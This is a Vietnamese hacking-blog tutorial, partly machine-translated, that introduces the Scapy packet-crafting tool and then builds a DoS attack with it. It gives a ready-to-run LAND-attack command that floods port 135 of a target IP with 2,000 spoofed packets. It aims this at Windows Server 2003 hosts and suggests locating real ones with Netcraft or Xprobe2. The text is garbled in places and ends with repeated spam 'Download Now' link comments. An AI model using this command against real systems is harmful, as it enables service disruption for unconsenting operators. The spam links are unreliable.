Trong bài viết này, chúng tôi sẽ bổ sung thêm một công cụ mới gọi Scapy cho kho vũ khí của bạn. Scapy là một công cụ thao tác tương tự như gói Nmap và hping, nhưng không giống như những công cụ khác, Scapy là gần như vô hạn tùy biến. Đây không phải là để nói rằng Nmap và Hping là không thể tùy biến, nhưng khả năng của họ để có thể chỉnh hạn chế. Scapy, mặt khác, hầu như không có giới hạn trong khả năng của bạn để tùy chỉnh nó, nhưng nó vẫn có một chút của một đường cong học tập.
Nếu bạn đầu tư thời gian để hiểu Scapy, bạn sẽ được thưởng một vũ khí rất mạnh mẽ.
Understanding TCP/IP
Khi sử dụng một công cụ như Scapy, Nmap, hping, và những người khác, nó là rất quan trọng bạn hiểu được cấu trúc của cả hai tiêu đề IP và TCP header.Scapy cũng rất linh hoạt. Nó có thể được tùy chỉnh để làm ARP spoofing, ARP cache, packet sniffing và phân tích như Tcpdump và Wireshark, tiêm chích 802.1 khung như aireplay-ng, và VoIP giải mã như Cain và Abel. Nó được viết bằng Python bởi Philipe Biondi và có khả năng crafting gói cũng như các gói giải mã. Cú pháp của nó là một chút mơ hồ, nhưng sức mạnh của nó làm cho nó có giá trị đầu tư thời gian để học.
Trong bài viết này, tôi sẽ cố gắng giới thiệu lần đầu tiên bạn đến cú pháp Scapy và sau đó chúng tôi sẽ sử dụng nó cho một cuộc tấn công DoS đơn giản nhưng hiệu quả.
Step 1 Fire Up Kali & Run Scapy
Treen kali linux- kali > scapy
Step 2View the Scapy Configuration File
bay giờ chúng ta sẽ cấu hình- >>> conf
Step 3 Create a Packet
Vẻ đẹp của Scapy là khả năng tùy chỉnh xây dựng bất kỳ gói, bạn có thể tưởng tượng. Nói chung, các ngăn xếp TCP / IP của hệ điều hành của bạn sẽ xây dựng một gói RFC tuân thủ bất cứ khi nào bạn muốn giao tiếp qua Internet. Là một hacker, chúng ta thường muốn tạo ra một tùy chỉnh / gói duy nhất mà có thể không RFC tuân thủ với mục đích thu thập thông tin về mục tiêu của chúng tôi (tức là, quét) hoặc có thể tạo ra một điều kiện DoS bằng cách tạo ra một gói dữ liệu đó gây ra các hệ thống mục tiêu sụp đổ (tấn công mặt đất, ping của cái chết, fragroute, vv).Vì vậy, chúng ta hãy bắt đầu bằng cách tạo ra một gói tin IP đơn giản. Trong Scapy, đầu tiên bạn khai báo một biến đại diện cho gói của bạn và sau đó xác định các thuộc tính từng người một gói tin. Vì vậy, ở đây chúng tôi xác định gói tin của chúng tôi là "x" và sau đó cung cấp cho x nhiều thuộc tính. Hãy bắt đầu bằng cách định nghĩa "x" như một gói tin IP có TTL 64.
- >>> x=IP(ttl=64)
- >>> x
Bây giờ, chúng ta hãy thêm một số thuộc tính bổ sung để x biến này, chẳng hạn như một địa chỉ IP nguồn và đích. Cú pháp tương tự như Wireshark hay Tcpdump. Chúng tôi đại diện cho các thuộc tính nguồn IP với x.src và IP đích thuộc tính với x.dst tiếp theo giá trị trong dấu ngoặc kép ( ").
- >>> x.src="192.168.1.101"
- >>> x.dst="192.168.1.122"
Bây giờ chúng tôi đã tạo ra một gói tin với các thuộc tính sau:
- TTL=64
- Source IP is 192.168.1.101
- Destination IP is 192.168.1.122
Step 4 Built-in Functions
Scapy có số lượng lớn các chức năng được xây dựng trong. Chúng ta có thể liệt kê các chức năng này bằng cách gõ:- >>> lsc()
- >>> send(x)
Chúng ta có thể sử dụng Scapy để soạn thảo một gói với chỉ là về bất kỳ giá trị trong bất kỳ lĩnh vực tiêu đề tiêu đề IP hoặc TCP, chẳng hạn như kích thước cửa sổ, cờ, lĩnh vực phân mảnh, giá trị ghi nhận, số thứ tự, vv
Step 5 Tạo Attack
Tôi hy vọng bây giờ rằng bạn nhận được những ý kiến cho rằng Scapy để được sử dụng để thao tác bất kỳ trường nào trong các gói tin TCP / IP. Chúng tôi sẽ chơi với một số các lĩnh vực khác trong một hướng dẫn Scapy tiếp theo.Bây giờ, chúng ta hãy sử dụng khả năng này để tạo ra một gói tin độc hại và sau đó gửi nó cho một hệ thống mục tiêu. Windows Server 2003 (tin hay không thì chúng ta vẫn còn hàng triệu năm 2003 các máy chủ hiện có; kiểm tra trên Netcraft hoặc sử dụng Xprobe2 để tìm hệ điều hành phù hợp) là dễ bị tấn công nhất. Đây là một cuộc tấn công DoS mà sẽ gửi một gói tin quá khổ với mục tiêu với cùng một nguồn và địa chỉ IP đích và cùng một nguồn và cổng đích. Nó không phải luôn luôn sụp đổ hệ thống, nhưng sẽ làm chậm nó xuống đáng kể. Đối với các máy chủ web, làm chậm chúng xuống là có hiệu quả một DoS.
Hãy tạo ra rằng gói tin tấn công đất trong Scapy. Scapy có thể đưa tất cả các thuộc tính trong một lệnh duy nhất. Vì vậy, hãy tạo gói tin tấn công của chúng ta và gửi 2.000 lần. Chúng tôi có thể làm điều này bằng cách gõ:
- >>> send(IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
- send is the command
- IP defines the protocol for IP addresses
- src="192.168.1.122" is the source IP address
- dst="192.168.1.122" is the destination IP address
- TCP defines the protocol for the ports
- sport=135 defines the source port
- dport=135 defines the destination port
- count=2000 defines the number of packets we want to send
Scapy là có khác là quét mạnh mẽ và là công cụ trong kho vũ khí của chúng ta về các công cụ. Scapy là vô cùng linh hoạt cho phép chúng ta làm nhiều nhiệm vụ với các công cụ duy nhất này. Nó có hầu như một khả năng không giới hạn để tạo ra các gói tin với bất kỳ đặc điểm bạn có thể tưởng tượng và do đó tạo ra một kỹ thuật quét độc đáo và các cuộc tấn công DoS.
Hướng Dẫn Cài Đặt Và Tấn Công Ddos Bằng Scapy - Blog Vô Ưu Hacking And Security >>>>> Download Now
ReplyDelete>>>>> Download Full
Hướng Dẫn Cài Đặt Và Tấn Công Ddos Bằng Scapy - Blog Vô Ưu Hacking And Security >>>>> Download LINK
>>>>> Download Now
Hướng Dẫn Cài Đặt Và Tấn Công Ddos Bằng Scapy - Blog Vô Ưu Hacking And Security >>>>> Download Full
>>>>> Download LINK